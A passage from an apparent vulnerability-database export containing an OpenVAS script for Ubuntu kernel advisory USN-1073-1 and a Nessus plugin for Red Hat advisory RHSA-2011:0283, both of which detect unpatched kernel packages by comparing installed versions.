the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1073-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840592\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-28 16:24:14 +0100 (Mon, 28 Feb 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"USN\", value:\"1073-1\");\n script_cve_id(\"CVE-2010-0435\", \"CVE-2010-3448\", \"CVE-2010-3698\", \"CVE-2010-3859\", \"CVE-2010-3865\", \"CVE-2010-3873\", \"CVE-2010-3874\", \"CVE-2010-3875\", \"CVE-2010-3876\", \"CVE-2010-3877\", \"CVE-2010-3880\", \"CVE-2010-4074\", \"CVE-2010-4078\", \"CVE-2010-4079\", \"CVE-2010-4080\", \"CVE-2010-4081\", \"CVE-2010-4082\", \"CVE-2010-4083\", \"CVE-2010-4157\", \"CVE-2010-4160\", \"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4248\", \"CVE-2010-4249\");\n script_name(\"Ubuntu Update for linux, linux-ec2 vulnerabilities USN-1073-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU9\\.10\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1073-1\");\n script_tag(name:\"affected\", value:\"linux, linux-ec2 vulnerabilities on Ubuntu 9.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Gleb Napatov discovered that KVM did not correctly check certain privileged\n operations. A local attacker with access to a guest kernel could exploit\n this to crash the host system, leading to a denial of service.\n (CVE-2010-0435)\n\n Dan Jacobson discovered that ThinkPad video output was not correctly access\n controlled. A local attacker could exploit this to hang the system, leading\n to a denial of service. (CVE-2010-3448)\n\n It was discovered that KVM did not correctly initialize certain CPU\n registers. A local attacker could exploit this to crash the system, leading\n to a denial of service. (CVE-2010-3698)\n\n Dan Rosenberg discovered that the Linux kernel TIPC implementation\n contained multiple integer signedness errors. A local attacker could\n exploit this to gain root privileges. (CVE-2010-3859)\n\n Thomas Pollet discovered that the RDS network protocol did not\n check certain iovec buffers. A local attacker could exploit this\n to crash the system or possibly execute arbitrary code as the root\n user. (CVE-2010-3865)\n\n Dan Rosenberg discovered that the Linux kernel X.25 implementation\n incorrectly parsed facilities. A remote attacker could exploit this to\n crash the kernel, leading to a denial of service. (CVE-2010-3873)\n\n Dan Rosenberg discovered that the CAN protocol on 64bit systems did not\n correctly calculate the size of certain buffers. A local attacker could\n exploit this to crash the system or possibly execute arbitrary code as\n the root user. (CVE-2010-3874)\n\n Vasiliy Kulikov discovered that the Linux kernel X.25 implementation did\n not correctly clear kernel memory. A local attacker could exploit this to\n read kernel stack memory, leading to a loss of privacy. (CVE-2010-3875)\n\n Vasiliy Kulikov discovered that the Linux kernel sockets implementation did\n not properly initialize certain structures. A local attacker could exploit\n this to read kernel stack memory, leading to a loss of privacy.\n (CVE-2010-3876)\n\n Vasiliy Kulikov discovered that the TIPC interface did not correctly\n initialize certain structures. A local attacker could exploit this to read\n kernel stack memory, leading to a loss of privacy. (CVE-2010-3877)\n\n Nelson Elhage discovered that the Linux kernel IPv4 implementation did not\n properly audit certain bytecodes in netlink messages. A local attacker\n could exploit this to cause the kernel to hang, leading to a denial of\n service. (CVE-2010-3880)\n\n Dan Rosenberg discovered that the USB subsystem did not correctly\n initialize certain structures. A local attacker could exploit this to read ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-307-ec2\", ver:\"2.6.31-307.27\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-307-ec2\", ver:\"2.6.31-307.27\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-386\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-generic-pae\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-generic\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-386\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-generic-pae\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-generic\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-virtual\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-doc\", ver:\"2.6.31-307.27\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-source-2.6.31\", ver:\"2.6.31-307.27\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-307\", ver:\"2.6.31-307.27\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.31\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-17T13:08:56", "description": "Updated kernel packages that fix three security issues, several bugs,\nand add two enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* A divide-by-zero flaw was found in the tcp_select_initial_window()\nfunction in the Linux kernel's TCP/IP protocol suite implementation. A\nlocal, unprivileged user could use this flaw to trigger a denial of\nservice by calling setsockopt() with certain options. (CVE-2010-4165,\nModerate)\n\n* A use-after-free flaw in the mprotect() system call in the Linux\nkernel could allow a local, unprivileged user to cause a local denial\nof service. (CVE-2010-4169, Moderate)\n\n* A flaw was found in the Linux kernel execve() system call\nimplementation. A local, unprivileged user could cause large amounts\nof memory to be allocated but not visible to the OOM (Out of Memory)\nkiller, triggering a denial of service. (CVE-2010-4243, Moderate)\n\nRed Hat would like to thank Steve Chen for reporting CVE-2010-4165,\nand Brad Spengler for reporting CVE-2010-4243.\n\nThis update also fixes several bugs and adds two enhancements.\nDocumentation for these bug fixes and enhancements will be available\nshortly from the Technical Notes document linked to in the References\nsection.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues, and fix the bugs and add\nthe enhancements noted in the Technical Notes. The system must be\nrebooted for this update to take effect.", "edition": 30, "published": "2011-02-23T00:00:00", "title": "RHEL 6 : kernel (RHSA-2011:0283)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4165", "CVE-2010-4169", "CVE-2010-4243"], "modified": "2011-02-23T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "REDHAT-RHSA-2011-0283.NASL", "href": "https://www.tenable.com/plugins/nessus/52062", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:0283. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(52062);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4243\");\n script_bugtraq_id(44830, 44861, 45004);\n script_xref(name:\"RHSA\", value:\"2011:0283\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2011:0283)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix three security issues, several bugs,\nand add two enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* A divide-by-zero flaw was found in the tcp_select_initial_window()\nfunction in the Linux kernel's TCP/IP protocol suite implementation. A\nlocal, unprivileged user could use this flaw to trigger a denial of\nservice by calling setsockopt() with certain options. (CVE-2010-4165,\nModerate)\n\n* A use-after-free flaw in the mprotect() system call in the Linux\nkernel could allow a local, unprivileged user to cause a local denial\nof service. (CVE-2010-4169, Moderate)\n\n* A flaw was found in the Linux kernel execve() system call\nimplementation. A local, unprivileged user could cause large amounts\nof memory to be allocated but not visible to the OOM (Out of Memory)\nkiller, triggering a denial of service. (CVE-2010-4243, Moderate)\n\nRed Hat would like to thank Steve Chen for reporting CVE-2010-4165,\nand Brad Spengler for reporting CVE-2010-4243.\n\nThis update also fixes several bugs and adds two enhancements.\nDocumentation for these bug fixes and enhancements will be available\nshortly from the Technical Notes document linked to in the References\nsection.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues, and fix the bugs and add\nthe enhancements noted in the Technical Notes. The system must be\nrebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-4165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-4169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-4243\"\n );\n # http://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/6/html/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?056c0c27\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:0283\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/11/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4243\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2011:0283\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:0283\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debuginfo-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-devel-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-devel-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-doc-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-firmware-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-headers-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-headers-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.32-71.18.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", 